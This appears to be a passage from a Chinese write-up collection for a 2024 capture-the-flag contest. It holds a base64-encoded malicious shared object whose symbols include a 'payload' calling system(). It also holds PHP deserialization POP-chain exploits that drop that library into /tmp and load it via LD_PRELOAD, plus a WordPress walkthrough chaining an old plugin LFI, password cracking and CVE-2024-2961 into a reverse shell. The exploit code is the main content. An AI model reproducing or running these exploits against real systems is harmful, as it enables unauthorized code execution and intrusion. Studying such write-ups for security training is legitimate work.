RUxPQUQAAAEbAzsoAAAABAAAAAzw//9EAAAAXPD//2wAAAAl8f//hAAAADvx//+kAAAAFAAAAAAAAAABelIAAXgQARsMBwiQAQAAJAAAABwAAADA7///UAAAAAAOEEYOGEoPC3cIgAA/GjsqMyQiAAAAABQAAABEAAAA6O///wgAAAAAAAAAAAAAABwAAABcAAAAmfD//xYAAAAAQQ4QhgJDDQZRDAcIAAAAHAAAAHwAAACP8P//OgAAAABBDhCGAkMNBnUMBwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwEQAAAAAAAPAQAAAAAAAAAQAAAAAAAACAAAAAAAAAAAwAAAAAAAAAABAAAAAAAAANAAAAAAAAAIwRAAAAAAAAGQAAAAAAAAD4PQAAAAAAABsAAAAAAAAACAAAAAAAAAAaAAAAAAAAAAA+AAAAAAAAHAAAAAAAAAAIAAAAAAAAAPX+/28AAAAAYAIAAAAAAAAFAAAAAAAAAHgDAAAAAAAABgAAAAAAAACIAgAAAAAAAAoAAAAAAAAAlgAAAAAAAAALAAAAAAAAABgAAAAAAAAAAwAAAAAAAADoPwAAAAAAAAIAAAAAAAAAYAAAAAAAAAAUAAAAAAAAAAcAAAAAAAAAFwAAAAAAAADwBAAAAAAAAAcAAAAAAAAASAQAAAAAAAAIAAAAAAAAAKgAAAAAAAAACQAAAAAAAAAYAAAAAAAAAP7//28AAAAAKAQAAAAAAAD///9vAAAAAAEAAAAAAAAA8P//bwAAAAAOBAAAAAAAAPn//28AAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACD4AAAAAAAAAAAAAAAAAAAAAAAAAAAAANhAAAAAAAABGEAAAAAAAAFYQAAAAAAAAZhAAAAAAAAAgQAAAAAAAAEdDQzogKERlYmlhbiAxMi4yLjAtMTQpIDEyLjIuMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAIADACAEAAAAAAAAAAAAAAAAAAADgAAAAIADACwEAAAAAAAAAAAAAAAAAAAIQAAAAIADADwEAAAAAAAAAAAAAAAAAAANwAAAAEAFwAoQAAAAAAAAAEAAAAAAAAAQwAAAAEAEgAAPgAAAAAAAAAAAAAAAAAAagAAAAIADAAwEQAAAAAAAAAAAAAAAAAAdgAAAAEAEQD4PQAAAAAAAAAAAAAAAAAAlQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAmwAAAAEAEADYIAAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAqQAAAAIADQCMEQAAAAAAAAAAAAAAAAAArwAAAAEAFgAgQAAAAAAAAAAAAAAAAAAAvAAAAAEAEwAIPgAAAAAAAAAAAAAAAAAAxQAAAAAADwAUIAAAAAAAAAAAAAAAAAAA2AAAAAEAFgAoQAAAAAAAAAAAAAAAAAAA5AAAAAEAFQDoPwAAAAAAAAAAAAAAAAAA+gAAAAIACQAAEAAAAAAAAAAAAAAAAAAAAAEAABIAAAAAAAAAAAAAAAAAAAAAAAAAEwEAACAAAAAAAAAAAAAAAAAAAAAAAAAALwEAABIAAAAAAAAAAAAAAAAAAAAAAAAAQgEAACAAAAAAAAAAAAAAAAAAAAAAAAAAUQEAABIADAA5EQAAAAAAABYAAAAAAAAAWQEAABIAAAAAAAAAAAAAAAAAAAAAAAAAbgEAABIADABPEQAAAAAAADoAAAAAAAAAegEAACAAAAAAAAAAAAAAAAAAAAAAAAAAlAEAACIAAAAAAAAAAAAAAAAAAAAAAAAAAGNydHN0dWZmLmMAZGVyZWdpc3Rlcl90bV9jbG9uZXMAX19kb19nbG9iYWxfZHRvcnNfYXV4AGNvbXBsZXRlZC4wAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eF9maW5pX2FycmF5X2VudHJ5AGZyYW1lX2R1bW15AF9fZnJhbWVfZHVtbXlfaW5pdF9hcnJheV9lbnRyeQBFWFAuYwBfX0ZSQU1FX0VORF9fAF9maW5pAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUNfRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9pbml0AGdldGVudkBHTElCQ18yLjIuNQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAc3lzdGVtQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAHBheWxvYWQAdW5zZXRlbnZAR0xJQkNfMi4yLjUAZ2V0cGFnZXNpemUAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZUBHTElCQ18yLjIuNQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBs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"; // 生成的.so文件的base64编码
$this->callback->fun = new FILE;
$this->callback->fun->filename = "hack.so";
$this->back = "a";
}
public function __isset($arg1)
{
system("cat /flag");
$this->callback->p;
echo "You are stupid, what exactly is your identity?";
//flag{fake_flag} really flag is located /fllllllll1ag
}
}
class FILE{
public $filename;
public $enviroment;
public function __get($arg1){
if("hacker"==$this->enviroment){
echo "Hacker is bad guy!!!";
}
}
public function __call($function_name,$value)
{
if (preg_match('/.[^.]*$/', $this->filename, $matches)) {
echo $value[0];
$uploadDir = "/tmp/";
$destination = $uploadDir . md5(time()) . $matches[0];
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755, true);
}
file_put_contents($this->filename, $value[0]);
if (rename($this->filename, $destination)) {
echo "文件成功移动到 {$destination}";
} else {
echo '文件移动失败。';
}
} else {
echo "非法文件名。";
}
}
}
class FUN{
public $fun;
public $value;
public function __get($name)
{
$this->fun->getflag($this->value);
}
}
echo time();
$a = new Env();
$a->math = new DIFF;
echo urlencode(serialize($a));
pop2:
<?php
highlight_file(__FILE__);
//error_reporting(E_ALL);
//ini_set('display_errors', 1);
//system("cat *");
function filter($a)
{
$pattern = array(''', '"','%','(',')',';','bash');
$pattern = '/' . implode('|', $pattern) . '/i';
if(preg_match($pattern,$a)){
die("No inject");
}
return $a;
}
class Env{
public $key;
public $value;
public $math;
public function __toString()
{
$key=filter($this->key);
$value=filter($this->value);
putenv("$key=$value");
system("cat robots.txt");
}
public function __wakeup()
{
echo "cccc";
if (isset($this->math->flag))
{
echo "YesYes";
} else {
echo "YesYesYes";
}
}
}
class DIFF{
public $callback;
public $back;
private $flag;
public function __construct()
{
$this->callback = new FILE;
$this->callback->enviroment = new Env;
$this->callback->enviroment->value="/tmp/06fe6f06df6b6bc1178fd1b914f3ba05.so"; // 移动的文件名字
$this->callback->enviroment->key="LD_PRELOAD";
}
public function __isset($arg1)
{
system("cat /flag");
$this->callback->p;
echo "You are stupid, what exactly is your identity?";
//flag{fake_flag} really flag is located /fllllllll1ag
}
}
class FILE{
public $filename;
public $enviroment;
public function __get($arg1){
if("hacker"==$this->enviroment){
echo "Hacker is bad guy!!!";
}
}
public function __call($function_name,$value)
{
if (preg_match('/.[^.]*$/', $this->filename, $matches)) {
echo $value[0];
$uploadDir = "/tmp/";
$destination = $uploadDir . md5(time()) . $matches[0];
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755, true);
}
file_put_contents($this->filename, $value[0]);
if (rename($this->filename, $destination)) {
echo "文件成功移动到 {$destination}";
} else {
echo '文件移动失败。';
}
} else {
echo "非法文件名。";
}
}
}
class FUN{
public $fun;
public $value;
public function __get($name)
{
$this->fun->getflag($this->value);
}
}
echo time();
//$c = $_GET[1];
//unserialize($c);
$a = new Env();
$a->math = new DIFF;
echo urlencode(serialize($a));
w0rdpress
解题过程
首先看到网站是一个 WordPress, 翻看文章
能够得知其用了 SQLite 数据库
此处我们通过搜索可以得知 https://wordpress.org/plugins/sqlite-database-integration/
代码审计可以知道
可以知道数据库默认存在 /var/www/html/wp-content/database/.ht.sqlite, 考虑通过 LFI 进行下载
我们通过 wpscan 可以找到有很多过时的插件
关注到 mail-masta 的 CVE-2016-10956, 采用这个工具尝试读取
https://github.com/p0dalirius/CVE-2016-10956-mail-masta/blob/master/CVE-2016-10956_mail_masta.py
下载完数据库打开后即可看到有 subscriber 用户
密码为 $P$BHU9YuIGcS2XbDZF106dBj0c2tjjfN/, 我们给到 john
下面得到密码为 123456
登录之后拿到 cookie,
我们再关注到 RVM 的 Subscriber 读
但是一直没有 RCE 的点, 于是考虑打 CVE-2024-2961 LFI to RCE
我们通过subscriber登录
使用 https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py
稍微改改脚本的逻辑
之后我们就可以通过 responsive-vector-maps 的任意文件读来发反弹 shell
原文始发于微信公众号(春秋伽玛):【WP】2024年春秋杯夏季赛解题思路详解合集
